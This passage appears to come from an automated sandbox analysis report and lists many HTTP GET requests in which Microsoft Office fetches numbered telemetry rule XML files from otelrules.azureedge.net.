            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
